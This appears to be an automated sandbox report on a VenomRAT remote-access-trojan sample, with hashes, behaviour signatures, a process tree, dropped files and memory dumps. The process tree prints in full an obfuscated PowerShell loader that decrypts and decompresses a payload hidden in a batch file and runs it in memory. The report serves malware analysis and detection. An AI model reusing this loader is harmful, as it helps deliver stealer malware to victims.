Analysis
max time kernel: 50s
max time network: 23s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 15-04-2024 15:53
Behavioral tasks
behavioral1: Sample VenomRAT v6.0.3/Client.exe, Resource win7-20240221-en
behavioral2: Sample VenomRAT v6.0.3/Client.exe, Resource win10v2004-20240412-en
behavioral3: Sample VenomRAT v6.0.3/Venom RAT + HVNC + Stealer + Grabber.exe, Resource win7-20240221-en
General
Target: VenomRAT v6.0.3/Venom RAT + HVNC + Stealer + Grabber.exe
Size: 26.1MB
MD5: a8776c9984c7b6c4f18bf0505ca939b5
SHA1: e23a41b6f03f11d3b6a64d5645fa102f373bd292
SHA256: 5dbb0f9df5fc34b49f0e284afe9037206c29dd8e50f0adbbcca785dcca89592e
SHA512: 9ebb8d42d1649cb2b3e97bd703d5daa4b1a87f21949c279335f5b0ee834ef185be473e23f82f0562a0f22c1e54675259113c6555976aee5b5def2087b34a8398
SSDEEP: 786432:/h9/AxUNfm9O7HYazcKB9rZsiqS+r+/hGykCCU1:/h9YxUNpTYGRQGhGykCC
Malware Config
Signatures
Executes dropped EXE (1 IoC)
  Processes: pid 2652, Venom RAT + HVNC + Stealer + Grabber.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes: pid 2480, powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: pid 2480, powershell.exe, Token: SeDebugPrivilege

Suspicious use of WriteProcessMemory (15 IoCs)
  Processes: Venom RAT + HVNC + Stealer + Grabber.exe, cmd.exe
  description | pid | process | target process
  PID 2508 wrote to memory of 2520 | 2508 | Venom RAT + HVNC + Stealer + Grabber.exe | cmd.exe
  PID 2508 wrote to memory of 2520 | 2508 | Venom RAT + HVNC + Stealer + Grabber.exe | cmd.exe
  PID 2508 wrote to memory of 2520 | 2508 | Venom RAT + HVNC + Stealer + Grabber.exe | cmd.exe
  PID 2508 wrote to memory of 2652 | 2508 | Venom RAT + HVNC + Stealer + Grabber.exe | Venom RAT + HVNC + Stealer + Grabber.exe
  PID 2508 wrote to memory of 2652 | 2508 | Venom RAT + HVNC + Stealer + Grabber.exe | Venom RAT + HVNC + Stealer + Grabber.exe
  PID 2508 wrote to memory of 2652 | 2508 | Venom RAT + HVNC + Stealer + Grabber.exe | Venom RAT + HVNC + Stealer + Grabber.exe
  PID 2652 wrote to memory of 2724 | 2652 | Venom RAT + HVNC + Stealer + Grabber.exe | WerFault.exe
  PID 2652 wrote to memory of 2724 | 2652 | Venom RAT + HVNC + Stealer + Grabber.exe | WerFault.exe
  PID 2652 wrote to memory of 2724 | 2652 | Venom RAT + HVNC + Stealer + Grabber.exe | WerFault.exe
  PID 2520 wrote to memory of 2448 | 2520 | cmd.exe | cmd.exe
  PID 2520 wrote to memory of 2448 | 2520 | cmd.exe | cmd.exe
  PID 2520 wrote to memory of 2448 | 2520 | cmd.exe | cmd.exe
  PID 2520 wrote to memory of 2480 | 2520 | cmd.exe | powershell.exe
  PID 2520 wrote to memory of 2480 | 2520 | cmd.exe | powershell.exe
  PID 2520 wrote to memory of 2480 | 2520 | cmd.exe | powershell.exe
Processes (process tree; number in brackets is the depth in the tree)
[1] C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe"
    Signatures: Suspicious use of WriteProcessMemory
    [2] C:\Windows\system32\cmd.exe
        Command line: cmd /c ""C:\Users\Admin\AppData\Roaming\Venom.bat" "
        Signatures: Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /S /D /c" echo function ztZFv($NRwiA){ $nQAla=[System.Security.Cryptography.Aes]::Create(); $nQAla.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nQAla.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nQAla.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('QdoYxUkiCqDUKhWwrTH7AerfcIF5j7b/N2RWKPLtoYY='); $nQAla.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('odLQJwhJTyobsFXcB4hGIA=='); $gHZYb=$nQAla.CreateDecryptor(); $return_var=$gHZYb.TransformFinalBlock($NRwiA, 0, $NRwiA.Length); $gHZYb.Dispose(); $nQAla.Dispose(); $return_var;}function RqfAN($NRwiA){ $eThoy=New-Object System.IO.MemoryStream(,$NRwiA); $sppNM=New-Object System.IO.MemoryStream; Invoke-Expression '$TwzvL #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$eThoy,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $TwzvL.CopyTo($sppNM); $TwzvL.Dispose(); $eThoy.Dispose(); $sppNM.Dispose(); $sppNM.ToArray();}function mReVh($NRwiA,$dHouc){ $RXzAR = @( '$nUQVd = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$NRwiA);', '$TAeyG = $nUQVd.EntryPoint;', '$TAeyG.Invoke($null, $dHouc);' ); foreach ($CnxNU in $RXzAR) { Invoke-Expression $CnxNU };}$DsIiH=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Roaming\Venom.bat').Split([Environment]::NewLine);foreach ($REdJF in $DsIiH) { if ($REdJF.StartsWith('SEROXEN')) { $LHnvh=$REdJF.Substring(7); break; }}$AShmJ=RqfAN (ztZFv ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($LHnvh)));mReVh $AShmJ (,[string[]] ('C:\Users\Admin\AppData\Roaming\Venom.bat')); "
        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
            Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    [2] C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe
        Command line: "C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe"
        Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\WerFault.exe
            Command line: C:\Windows\system32\WerFault.exe -u -p 2652 -s 532
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe
  Filesize: 14.2MB
  MD5: 3b3a304c6fc7a3a1d9390d7cbff56634
  SHA1: e8bd5244e6362968f5017680da33f1e90ae63dd7
  SHA256: 7331368c01b2a16bda0f013f376a039e6aeb4cb2dd8b0c2afc7ca208fb544c58
  SHA512: 7f1beacb6449b3b3e108016c8264bb9a21ecba526c2778794f16a7f9c817c0bbd5d4cf0c208d706d25c54322a875da899ab047aab1e07684f6b7b6083981abe5

C:\Users\Admin\AppData\Roaming\Venom.bat
  Filesize: 11.9MB
  MD5: 04fd97b8a5d2132eee84f856ee0fa938
  SHA1: 0d1d515140d76fcd9a2dc7f08f9d7a7d9f8d691a
  SHA256: bb33e3c94abeda061b89a1d70d2430b74fcc40a81b09c732878939308a676e49
  SHA512: e5b4e624343b3e9bec048c894ba681a44d8e71735c03445c361f059dc0aeb53afabeee37bb82ea9ad47187d305ecf28c1b6e46a039a1630da08e2488edb00778

Memory dumps (Filesize)
memory/2480-31-0x0000000002540000-0x00000000025C0000-memory.dmp: 512KB
memory/2480-33-0x000007FEEF370000-0x000007FEEFD0D000-memory.dmp: 9.6MB
memory/2480-37-0x0000000002540000-0x00000000025C0000-memory.dmp: 512KB
memory/2480-36-0x0000000002540000-0x00000000025C0000-memory.dmp: 512KB
memory/2480-35-0x0000000002540000-0x00000000025C0000-memory.dmp: 512KB
memory/2480-34-0x0000000002540000-0x00000000025C0000-memory.dmp: 512KB
memory/2480-24-0x000000001B240000-0x000000001B522000-memory.dmp: 2.9MB
memory/2480-25-0x000007FEEF370000-0x000007FEEFD0D000-memory.dmp: 9.6MB
memory/2480-26-0x0000000002320000-0x0000000002328000-memory.dmp: 32KB
memory/2480-27-0x000007FEEF370000-0x000007FEEFD0D000-memory.dmp: 9.6MB
memory/2480-28-0x0000000002540000-0x00000000025C0000-memory.dmp: 512KB
memory/2480-29-0x0000000002540000-0x00000000025C0000-memory.dmp: 512KB
memory/2480-30-0x0000000002540000-0x00000000025C0000-memory.dmp: 512KB
memory/2508-18-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp: 9.9MB
memory/2508-0-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp: 9.9MB
memory/2508-2-0x000000001CAD0000-0x000000001CB50000-memory.dmp: 512KB
memory/2508-1-0x0000000001340000-0x0000000002D6A000-memory.dmp: 26.2MB
memory/2652-32-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp: 9.9MB
memory/2652-19-0x0000000000330000-0x0000000001164000-memory.dmp: 14.2MB
memory/2652-17-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp: 9.9MB